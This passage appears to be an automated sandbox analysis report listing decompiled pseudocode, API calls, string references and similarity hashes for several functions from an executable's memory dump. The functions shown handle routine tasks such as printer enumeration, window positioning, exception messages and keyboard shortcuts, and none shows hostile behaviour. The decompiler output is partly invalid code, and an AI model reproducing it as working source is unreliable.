								__eflags = __eax - _v8;
								if(__eax != _v8) {
									__ecx = 0;
									__eflags = 0;
									__edx = __edi;
									__eax = __esi;
									__ebx = __esi->i;
									__eax =  *((intOrPtr*)(__esi->i + 0xf0))();
									__edi = __esi;
								} else {
									__ecx = 0;
									__edx = __edi;
									__eax = __esi;
									__ebx = __esi->i;
									__eax =  *((intOrPtr*)(__esi->i + 0xf4))();
									__edi = __esi;
								}
								__eax =  *(__esi + 0x210);
								__eax = E00496458( *(__esi + 0x210), __edx);
								__edx = _v8;
								__eax = E0041D8A4(__eax, __ecx, _v8);
								__eflags = __edi;
								if(__edi == 0) {
									__eax =  *(__esi + 0x2ac);
									__eax =  *(__esi + 0x2c4);
									E0044D590( *(__esi + 0x2c4)) = PostMessageA(__eax, 0xb402, 0,  *(__esi + 0x2ac));
								} else {
									__eax =  *(__edi + 0x40);
									__ecx =  *( *(__edi + 0x40));
									__eax =  *((intOrPtr*)( *( *(__edi + 0x40)) + 0xd8))();
								}
								__eax = __esi;
								__eax = E004943D4(__esi);
								goto L34;
							} else {
								_push(0);
								__eax =  &_v16;
								_push( &_v16);
								__edx =  &_v28;
								__edi = E00497924(__edi,  &_v28);
								__eax = _v28;
								_v24 = _v28;
								_v20 = 0xb;
								__eax =  &_v24;
								_push( &_v24);
								__edx =  &_v32;
								__eax =  *0x4bb130; // 0x42666c
								__eax = E0040656C(__eax, __ecx,  &_v32);
								__eax = _v32;
								__ecx = 0;
								_pop(__edx);
								E00409B8C(_v32, 0, __edx) = _v16;
								__eax = E00440030();
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L34;
								}
								goto L27;
							}
					}
				}
			}

0x0048efc8
0x0048efcd
0x0048efce
0x0048efcf
0x0048efd0
0x0048efd1
0x0048efd2
0x0048efd3
0x0048efd4
0x0048efd5
0x0048efd6
0x0048efd7
0x0048efd9
0x0048efdd
0x0048efde
0x0048efe3
0x0048efe6
0x0048efed
0x0048eff9
0x0048f297
0x0048f299
0x0048f29c
0x0048f29f
0x0048f2ac
0x0048f2be
0x0048efff
0x0048f006
0x0048f00e
0x0048f010
0x0048f01f
0x0048f03b
0x0048f03f
0x0048f046
0x0048f046
0x0048f03f
0x0048f01f
0x0048f010
0x0048f050
0x0048f056
0x00000000
0x00000000
0x0048f062
0x00000000
0x00000000
0x00000000
0x0048f0af
0x00000000
0x00000000
0x0048f0bb
0x0048f0bd
0x00000000
0x00000000
0x0048f0c7
0x0048f0ce
0x0048f0d1
0x0048f0d3
0x00000000
0x00000000
0x0048f0dd
0x0048f0e4
0x0048f0e7
0x0048f0e9
0x00000000
0x00000000
0x0048f0f3
0x0048f0f5
0x0048f0fa
0x0048f0fc
0x0048f102
0x0048f104
0x0048f10c
0x0048f10e
0x0048f10e
0x00000000
0x00000000
0x0048f119
0x0048f11b
0x0048f11d
0x0048f123
0x0048f125
0x0048f13c
0x0048f13c
0x0048f143
0x0048f148
0x0048f14a
0x0048f156
0x0048f158
0x0048f15a
0x0048f14c
0x0048f14c
0x0048f14c
0x00000000
0x0048f14a
0x0048f127
0x0048f12e
0x00000000
0x00000000
0x0048f130
0x0048f132
0x00000000
0x00000000
0x0048f165
0x0048f167
0x0048f169
0x0048f16f
0x0048f171
0x00000000
0x00000000
0x0048f177
0x0048f179
0x0048f17e
0x0048f180
0x00000000
0x00000000
0x0048f186
0x0048f18d
0x0048f18f
0x0048f193
0x0048f195
0x0048f198
0x0048f19d
0x0048f1a2
0x0048f1a7
0x0048f1ac
0x0048f1b1
0x0048f1b1
0x0048f1b8
0x0048f1bd
0x0048f1bf
0x0048f20f
0x0048f20f
0x0048f216
0x0048f219
0x0048f21b
0x0048f21d
0x0048f223
0x0048f224
0x0048f227
0x0048f23b
0x0048f23b
0x0048f23d
0x0048f23f
0x0048f241
0x0048f243
0x0048f249
0x0048f229
0x0048f229
0x0048f22b
0x0048f22d
0x0048f22f
0x0048f231
0x0048f237
0x0048f237
0x0048f24b
0x0048f251
0x0048f256
0x0048f259
0x0048f25e
0x0048f260
0x0048f271
0x0048f27f
0x0048f28b
0x0048f262
0x0048f262
0x0048f267
0x0048f269
0x0048f269
0x0048f290
0x0048f292
0x00000000
0x0048f1c1
0x0048f1c1
0x0048f1c3
0x0048f1c6
0x0048f1c7
0x0048f1cc
0x0048f1d1
0x0048f1d4
0x0048f1d7
0x0048f1db
0x0048f1de
0x0048f1df
0x0048f1e2
0x0048f1e7
0x0048f1ec
0x0048f1ef
0x0048f1f1
0x0048f1f7
0x0048f203
0x0048f208
0x0048f208
0x0048f209
0x00000000
0x00000000
0x00000000
0x0048f209
0x00000000
0x0048f062

Strings

tfB, xrefs: 0048F198
lfB, xrefs: 0048F1E2

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: lfB$tfB
API String ID: 0-4198042361
Opcode ID: 11f6c561b4ac2a9270e9780ac36f68af9647598075f1f747ed863fc1fa8f50f6
Instruction ID: e20f4dd67923ee819f100dddc8b931b44399fca85fc4aea7cd29c53d5455eba5
Opcode Fuzzy Hash: 11f6c561b4ac2a9270e9780ac36f68af9647598075f1f747ed863fc1fa8f50f6
Instruction Fuzzy Hash: 4271AE347002008BDB15FB69C485AAEB7A5AF45708F1449BBF805CB752DB39EC0AC75E

Uniqueness

Uniqueness Score: -1.00%

Function 00432090, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00432090(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char* _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				char _v32;
				char _v36;
				signed int _v37;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				intOrPtr* _t76;
				intOrPtr _t85;
				intOrPtr _t99;
				intOrPtr _t119;
				char _t120;
				intOrPtr* _t121;
				void* _t124;
				intOrPtr _t139;
				intOrPtr _t144;
				intOrPtr _t155;
				intOrPtr _t156;
				signed int _t161;
				void* _t163;
				void* _t164;
				void* _t166;
				void* _t167;
				intOrPtr _t168;

				_t166 = _t167;
				_t168 = _t167 + 0xffffffc0;
				_v48 = 0;
				_v52 = 0;
				_v44 = 0;
				_v8 = __eax;
				_push(_t166);
				_push(0x4322cd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t168;
				if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
					_v12 =  *((intOrPtr*)(_v8 + 0x10));
					goto L19;
				} else {
					_t119 = E004035DC(1);
					 *((intOrPtr*)(_v8 + 0x10)) = _t119;
					_v12 = _t119;
					_push(_t166);
					_push(0x432287);
					_push( *[fs:edx]);
					 *[fs:edx] = _t168;
					_t76 =  *0x4bb248; // 0x4a00c4
					if( *_t76 != 2) {
						_t120 = 2;
						_v37 = 5;
					} else {
						_t120 = 6;
						_v37 = 4;
					}
					_v32 = 0;
					_push( &_v36);
					_push( &_v32);
					_push(0);
					_push(0);
					_t161 = _v37 & 0x000000ff;
					_push(_t161);
					_push(0);
					_push(_t120);
					L0043158C();
					if(_v32 != 0) {
						_v24 = E00402AE4(_v32, _t124, 0);
						_push(_t166);
						_push(0x432276);
						_push( *[fs:edx]);
						 *[fs:edx] = _t168;
						_push( &_v36);
						_push( &_v32);
						_push(_v32);
						_t85 = _v24;
						_push(_t85);
						_push(_t161);
						_push(0);
						_push(_t120);
						L0043158C();
						if(_t85 != 0) {
							_v28 = _v24;
							_t163 = _v36 - 1;
							if(_t163 >= 0) {
								_t164 = _t163 + 1;
								do {
									if(_v37 != 4) {
										_t121 = _v28;
										_v16 =  *((intOrPtr*)(_t121 + 4));
										_v20 = E00431694( &_v16);
										while( *_v20 != 0) {
											_t99 =  *0x4bad64; // 0x426474
											E0040656C(_t99, 0,  &_v52);
											_v68 =  *_t121;
											_v64 = 6;
											_v60 = _v20;
											_v56 = 6;
											E00409B8C(_v52, 1,  &_v68,  &_v48);
											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)))) + 0x3c))(E004317A0(0, 1, _v20,  *_t121));
											_v20 = E00431694( &_v16);
										}
										_v28 = _v28 + 0x14;
									} else {
										E004045D0( &_v44,  *_v28);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)))) + 0x3c))(E004317A0(0, 1, 0,  *_v28));
										_v28 = _v28 + 0xc;
									}
									_t164 = _t164 - 1;
								} while (_t164 != 0);
							}
							_pop(_t144);
							 *[fs:eax] = _t144;
							_push(0x43227d);
							return E00402B14(_v24);
						} else {
							E00403E98();
							_pop(_t155);
							 *[fs:eax] = _t155;
							goto L19;
						}
					} else {
						_pop(_t156);
						 *[fs:eax] = _t156;
						L19:
						_pop(_t139);
						 *[fs:eax] = _t139;
						_push(0x4322d4);
						return E004043FC( &_v52, 3);
					}
				}
			}

0x00432091
0x00432093
0x0043209b
0x0043209e
0x004320a1
0x004320a4
0x004320a9
0x004320aa
0x004320af
0x004320b2
0x004320bc
0x004322af
0x00000000
0x004320c2
0x004320ce
0x004320d3
0x004320d6
0x004320db
0x004320dc
0x004320e1
0x004320e4
0x004320e7
0x004320ef
0x004320fc
0x00432101
0x004320f1
0x004320f1
0x004320f6
0x004320f6
0x00432107
0x0043210d
0x00432111
0x00432112
0x00432114
0x00432116
0x0043211a
0x0043211b
0x0043211d
0x0043211e
0x00432127
0x0043213e
0x00432143
0x00432144
0x00432149
0x0043214c
0x00432152
0x00432156
0x0043215a
0x0043215b
0x0043215e
0x0043215f
0x00432160
0x00432162
0x00432163
0x0043216a
0x00432181
0x00432187
0x0043218a
0x00432190
0x00432191
0x00432195
0x004321d0
0x004321d6
0x004321e1
0x0043224a
0x00432203
0x00432208
0x00432212
0x00432215
0x0043221c
0x0043221f
0x0043222b
0x0043223c
0x00432247
0x00432247
0x00432252
0x00432197
0x004321b3
0x004321c4
0x004321c7
0x004321c7
0x00432256
0x00432256
0x00432191
0x0043225f
0x00432262
0x00432265
0x00432275
0x0043216c
0x0043216c
0x00432173
0x00432176
0x00000000
0x00432176
0x00432129
0x0043212b
0x0043212e
0x004322b2
0x004322b4
0x004322b7
0x004322ba
0x004322cc
0x004322cc
0x00432127

APIs

738D6BB0.WINSPOOL.DRV(00000002,00000000,?,00000000,00000000,?,?,00000000,00432287,?,00000000,004322CD,?,00000000), ref: 0043211E
738D6BB0.WINSPOOL.DRV(00000002,00000000,?,?,?,?,?,00000000,00432276,?,00000002,00000000,?,00000000,00000000,?), ref: 00432163

Strings

tdB, xrefs: 00432203

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: tdB
API String ID: 0-905615233
Opcode ID: 40199abf5bc58535117fd4b6ef43530856557fc0f6f1715ef57f196c84813990
Instruction ID: 87159ea1f92e3731019a7359f621114d806ea549d827d891ebf1df8232e1e6c2
Opcode Fuzzy Hash: 40199abf5bc58535117fd4b6ef43530856557fc0f6f1715ef57f196c84813990
Instruction Fuzzy Hash: F6713C71A04209AFDB15CF99DD81AAFBBF9FB4C310F20946AE500A7351D778AD01CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0044506C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0044506C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t88;
				intOrPtr _t105;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t137;

				_t137 = __fp0;
				_v8 = __ecx;
				_t88 = __edx;
				_t124 = __eax;
				 *0x4bcaf8 = __eax;
				_push(_t133);
				_push(0x445211);
				_push( *[fs:edx]);
				 *[fs:edx] = _t134;
				_v12 = 0;
				 *0x4bcb00 = 0;
				_t135 =  *((char*)(__eax + 0x9b));
				if( *((char*)(__eax + 0x9b)) != 0) {
					E00403814(__eax, __eflags);
					__eflags =  *0x4bcaf8;
					if( *0x4bcaf8 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							_v12 = E0044441C(1, _t124);
							 *0x4bcb00 = 1;
						}
						_t128 =  *((intOrPtr*)(_v12 + 0x38));
						_t105 =  *0x442c24; // 0x442c70
						_t54 = E004037A4( *((intOrPtr*)(_v12 + 0x38)), _t105);
						__eflags = _t54;
						if(_t54 == 0) {
							_t129 =  *((intOrPtr*)(_v12 + 0x38));
							__eflags =  *((intOrPtr*)(_t129 + 0x30));
							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
								L14:
								__eflags = 0;
								E0041B1A8(0,  &_v36, 0, _t124, _t129);
								E0044685C(_t129,  &_v28,  &_v36);
								_t60 = _v12;
								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
								L15:
								_t130 = _v12;
								_t125 =  *((intOrPtr*)(_v12 + 0x38));
								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
								E0041B1A8( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
								_t65 = _v12;
								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
								goto L16;
							}
							_t116 =  *0x442c24; // 0x442c70
							_t71 = E004037A4(_t129, _t116);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L14;
							}
							GetCursorPos( &_v20);
							_t74 = _v12;
							 *(_t74 + 0x44) = _v20.x;
							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
							goto L15;
						} else {
							GetWindowRect(E0044D590(_t128), _v12 + 0x44);
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L17:
							E00444EFC(_v12, _v8, _t88, _t133, _t137);
							_pop(_t115);
							 *[fs:eax] = _t115;
							return 0;
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					return 0;
				}
				E00403814(__eax, _t135);
				if( *0x4bcaf8 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_v12 = E00444304(_t124, 1);
						 *0x4bcb00 = 1;
					}
					goto L17;
				}
				_pop(_t123);
				 *[fs:eax] = _t123;
				return 0;
			}

0x0044506c
0x00445075
0x00445078
0x0044507a
0x0044507c
0x00445084
0x00445085
0x0044508a
0x0044508d
0x00445092
0x00445095
0x0044509c
0x004450a3
0x004450f9
0x004450fe
0x00445105
0x00445114
0x00445118
0x00445128
0x0044512b
0x0044512b
0x00445135
0x0044513a
0x00445140
0x00445145
0x00445147
0x00445165
0x00445168
0x0044516c
0x00445199
0x0044519e
0x004451a0
0x004451ad
0x004451b2
0x004451b8
0x004451be
0x004451c1
0x004451c1
0x004451ca
0x004451d3
0x004451d9
0x004451de
0x004451e4
0x004451ea
0x00000000
0x004451ea
0x00445170
0x00445176
0x0044517b
0x0044517d
0x00000000
0x00000000
0x00445183
0x00445188
0x0044518e
0x00445194
0x00000000
0x00445149
0x00445158
0x004451ed
0x004451f6
0x004451f7
0x004451f8
0x004451f9
0x004451fa
0x00445202
0x00445209
0x0044520c
0x00000000
0x0044520c
0x00445147
0x00445109
0x0044510c
0x00000000
0x0044510c
0x004450ae
0x004450ba
0x004450c9
0x004450cd
0x004450e1
0x004450e4
0x004450e4
0x00000000
0x004450cd
0x004450be
0x004450c1
0x00000000

Strings

p,D, xrefs: 0044513A, 00445170

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: p,D
API String ID: 0-3811598181
Opcode ID: e8714ca27a055753bf656f5485cb3131f5775208386e7c9b7d9568a94b52486e
Instruction ID: 3d3d3a5cccf3ed2b0c926f0775515cf98fc9568c1efc7196716e0f096db8aa3a
Opcode Fuzzy Hash: e8714ca27a055753bf656f5485cb3131f5775208386e7c9b7d9568a94b52486e
Instruction Fuzzy Hash: 40519175E046059FDF00DF5AD881A9EBBF5FF89314F1080AAE800A7352D779AD81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF20, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040CF20(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				struct _MEMORY_BASIC_INFORMATION _v40;
				char _v301;
				char _v308;
				intOrPtr _v312;
				char _v316;
				char _v320;
				char _v324;
				intOrPtr _v328;
				char _v332;
				void* _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				intOrPtr _v356;
				char _v360;
				char _v364;
				char _v368;
				void* _v372;
				char _v376;
				intOrPtr _t55;
				intOrPtr _t65;
				intOrPtr _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t107;
				void* _t114;
				void* _t115;
				void* _t118;

				_t115 = __esi;
				_t114 = __edi;
				_t98 = __ecx;
				_v376 = 0;
				_v340 = 0;
				_v348 = 0;
				_v344 = 0;
				_v8 = 0;
				_push(_t118);
				_push(0x40d0e3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t118 + 0xfffffe8c;
				_t95 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t95 + 0x14)) != 0) {
					_t55 =  *0x4bb050; // 0x407914
					E0040656C(_t55, __ecx,  &_v8);
				} else {
					_t92 =  *0x4bb258; // 0x40790c
					E0040656C(_t92, __ecx,  &_v8);
				}
				_v12 =  *((intOrPtr*)(_t95 + 0x18));
				VirtualQuery( *(_t95 + 0xc),  &_v40, 0x1c);
				if(_v40.State != 0x1000 || GetModuleFileNameA(_v40.AllocationBase,  &_v301, 0x105) == 0) {
					_v372 =  *(_t95 + 0xc);
					_v368 = 5;
					_v364 = _v8;
					_v360 = 0xb;
					_v356 = _v12;
					_v352 = 5;
					_t65 =  *0x4bb05c; // 0x4078b4
					E0040656C(_t65, _t98,  &_v376);
					E0040CB00(_t95, _v376, 1, _t114, _t115, 2,  &_v372);
				} else {
					_v336 =  *(_t95 + 0xc);
					_v332 = 5;
					E00404648( &_v344, 0x105,  &_v301);
					E00409330(_v344, 0x105,  &_v340);
					_v328 = _v340;
					_v324 = 0xb;
					_v320 = _v8;
					_v316 = 0xb;
					_v312 = _v12;
					_v308 = 5;
					_t88 =  *0x4bb0fc; // 0x4079e4
					E0040656C(_t88, 0x105,  &_v348);
					E0040CB00(_t95, _v348, 1, _t114, _t115, 3,  &_v336);
				}
				_pop(_t107);
				 *[fs:eax] = _t107;
				_push(E0040D0EA);
				E004043D8( &_v376);
				E004043FC( &_v348, 3);
				return E004043D8( &_v8);
			}

0x0040cf20
0x0040cf20
0x0040cf20
0x0040cf2c
0x0040cf32
0x0040cf38
0x0040cf3e
0x0040cf44
0x0040cf49
0x0040cf4a
0x0040cf4f
0x0040cf52
0x0040cf58
0x0040cf5f
0x0040cf73
0x0040cf78
0x0040cf61
0x0040cf64
0x0040cf69
0x0040cf69
0x0040cf80
0x0040cf8d
0x0040cf99
0x0040d058
0x0040d05e
0x0040d068
0x0040d06e
0x0040d078
0x0040d07e
0x0040d094
0x0040d099
0x0040d0ab
0x0040cfbc
0x0040cfbf
0x0040cfc5
0x0040cfdd
0x0040cfee
0x0040cff9
0x0040cfff
0x0040d009
0x0040d00f
0x0040d019
0x0040d01f
0x0040d035
0x0040d03a
0x0040d04c
0x0040d051
0x0040d0b4
0x0040d0b7
0x0040d0ba
0x0040d0c5
0x0040d0d5
0x0040d0e2

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D0E3), ref: 0040CF8D
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040D0E3), ref: 0040CFAF

Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E

Strings

y@, xrefs: 0040D035

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: y@
API String ID: 902310565-1812993971
Opcode ID: dc50034f6d17f8d9bd13dfb361d87b56784a81e70c345afcf94d68d8f5ef2637
Instruction ID: 1e4789998ece7e2516a096349d41a251f239e3dc166c5e00eab1ca4b9d7a36a2
Opcode Fuzzy Hash: dc50034f6d17f8d9bd13dfb361d87b56784a81e70c345afcf94d68d8f5ef2637
Instruction Fuzzy Hash: 2751F270A00658DFDB60DF68CD85BCAB7F4AB48304F4041EAE808AB381D779AE84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00431AF4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00431AF4(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t27;
				intOrPtr* _t40;
				intOrPtr _t55;
				struct HDC__* _t61;
				char _t65;
				intOrPtr _t71;
				void* _t73;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t87;
				void* _t90;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = 0;
				_t65 = __edx;
				_t84 = __eax;
				_push(_t87);
				_push(0x431c12);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xfffffff8;
				_t27 =  *((intOrPtr*)(__eax + 0x1f));
				if(__edx == _t27) {
					L21:
					_pop(_t71);
					 *[fs:eax] = _t71;
					_push(0x431c19);
					return E004043D8( &_v12);
				}
				_t82 = 0;
				_t73 = __edx - 1;
				_t90 = _t73;
				if(_t90 < 0) {
					E00431C20(__eax, 0);
					_t33 =  *((intOrPtr*)(_t84 + 4));
					if( *((intOrPtr*)(_t84 + 4)) != 0) {
						E0042955C(_t33, 0);
					}
					DeleteDC( *(_t84 + 0x20));
					 *(_t84 + 0x20) = 0;
					L15:
					if(_t82 != 0) {
						_t40 = E00432090(_t84, _t65, _t82, _t84);
						_t69 =  *_t40;
						_v8 =  *((intOrPtr*)( *_t40 + 0x18))(E00432078(_t84));
						 *(_t84 + 0x20) =  *_t82(E00404898( *((intOrPtr*)(_v8 + 4))), E00404898( *((intOrPtr*)(_v8 + 8))), E00404898( *((intOrPtr*)(_v8 + 0xc))),  *((intOrPtr*)(_t84 + 0x24)));
						if( *(_t84 + 0x20) == 0) {
							_t55 =  *0x4bb100; // 0x42646c
							E0040656C(_t55, _t69,  &_v12);
							E004316E4(_v12);
						}
						_t53 =  *((intOrPtr*)(_t84 + 4));
						if( *((intOrPtr*)(_t84 + 4)) != 0) {
							E0042955C(_t53,  *(_t84 + 0x20));
						}
					}
					 *((char*)(_t84 + 0x1f)) = _t65;
					goto L21;
				}
				if(_t90 == 0) {
					if(_t27 == 2) {
						goto L21;
					}
					_t82 = 0x406d4c;
				} else {
					if(_t73 == 1) {
						_t60 =  *((intOrPtr*)(__eax + 4));
						if( *((intOrPtr*)(__eax + 4)) != 0) {
							E0042955C(_t60, 0);
						}
						_t61 =  *(_t84 + 0x20);
						if(_t61 != 0) {
							DeleteDC(_t61);
						}
						_t82 = 0x406d24;
					}
				}
			}

0x00431afa
0x00431afb
0x00431afc
0x00431aff
0x00431b02
0x00431b04
0x00431b08
0x00431b09
0x00431b0e
0x00431b11
0x00431b14
0x00431b19
0x00431bfc
0x00431bfe
0x00431c01
0x00431c04
0x00431c11
0x00431c11
0x00431b1f
0x00431b23
0x00431b23
0x00431b26
0x00431b34
0x00431b39
0x00431b3e
0x00431b42
0x00431b42
0x00431b4b
0x00431b52
0x00431b86
0x00431b88
0x00431b94
0x00431b9a
0x00431b9f
0x00431bcc
0x00431bd3
0x00431bd8
0x00431bdd
0x00431be5
0x00431be5
0x00431bea
0x00431bef
0x00431bf4
0x00431bf4
0x00431bef
0x00431bf9
0x00000000
0x00431bf9
0x00431b28
0x00431b59
0x00000000
0x00000000
0x00431b5f
0x00431b2a
0x00431b2c
0x00431b66
0x00431b6b
0x00431b6f
0x00431b6f
0x00431b74
0x00431b79
0x00431b7c
0x00431b7c
0x00431b81
0x00431b81
0x00431b2c

APIs

DeleteDC.GDI32(?), ref: 00431B4B
DeleteDC.GDI32(?), ref: 00431B7C

Strings

ldB, xrefs: 00431BD8

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete
String ID: ldB
API String ID: 1035893169-667903305
Opcode ID: f23182a18b5c2541d3cfbfc284797e078516e28f25e930ae70a6c1e51262ffed
Instruction ID: 35e1beb8084b6117e91d645da988f93f07ceaa2da30d854eccb665eb5b2cd736
Opcode Fuzzy Hash: f23182a18b5c2541d3cfbfc284797e078516e28f25e930ae70a6c1e51262ffed
Instruction Fuzzy Hash: 6E315A307106049FC720EB7AD88191BB7E9AF4C710B15957BB449D7361EB38ED018A5C

Uniqueness

Uniqueness Score: -1.00%

Function 0045ADA8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0045ADA8(intOrPtr __eax, void* __ecx, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t59;
				intOrPtr _t65;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				intOrPtr _t73;

				_t53 = __ecx;
				_t70 = _t72;
				_t73 = _t72 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x4bcb70; // 0x1c40dc4
					E0042FB04(_t34, _t53,  &_v24);
					_push(_t70);
					_push(0x45aea6);
					_push( *[fs:eax]);
					 *[fs:eax] = _t73;
					while(1) {
						_v17 = 0;
						_v8 = E0045AAAC(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t65);
							_pop(_t56);
							 *[fs:eax] = _t65;
							_push(0x45aead);
							_t40 =  *0x4bcb70; // 0x1c40dc4
